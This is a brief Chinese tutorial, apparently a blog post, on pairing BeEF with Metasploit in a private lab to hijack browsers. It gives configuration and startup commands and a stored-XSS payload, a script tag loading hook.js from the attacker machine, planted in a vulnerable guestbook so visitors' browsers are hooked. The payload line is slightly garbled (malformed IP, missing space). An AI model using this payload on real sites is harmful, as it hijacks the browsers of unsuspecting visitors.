参考了网络很多大神文章,简单小结一下,仅供参考
1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true
2,配置vim /usr/share/beef-xss/extensions/metasploit/config.yaml,修改此文件配置两处ip为kali自身ip
3,首次启动msf,先启动postgresql数据库服务service postgresql restart,再启动msfconsole
4,msf终端内输入命令 load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123 //ServerHost为kali ip,User&Pass为2步骤配置的账号密码
5,修改beef默认账号密码, vim /etc/beef-xss/config.yaml //修改 User:beef,Password:beef
6,启动beef, beef-xss
1.Kali:IP:192.168.126.140
2.web服务器IP:192.168.126.205 存在XSS跨站脚本漏洞
3.客户端IP:192.168.126.130
4.Kali使用beef生成恶意代码网络
5.浏览器输入 http://127.0.0.1:3000/ui/panel,登陆beef,Usename与Password均为beef
6.将Hook URL “<scriptsrc="http://1192.168.126.140:3000/hook.js"></script>”写入存在XSS漏洞的web服务器文本框
7.只要客户端访问服务器192.168.126.205留言板,客户端浏览器就会被劫持框
service postgresql start //启动msf数据库
beef +metasploit关联拿shell教程
最新推荐文章于 2023-09-17 14:38:07 发布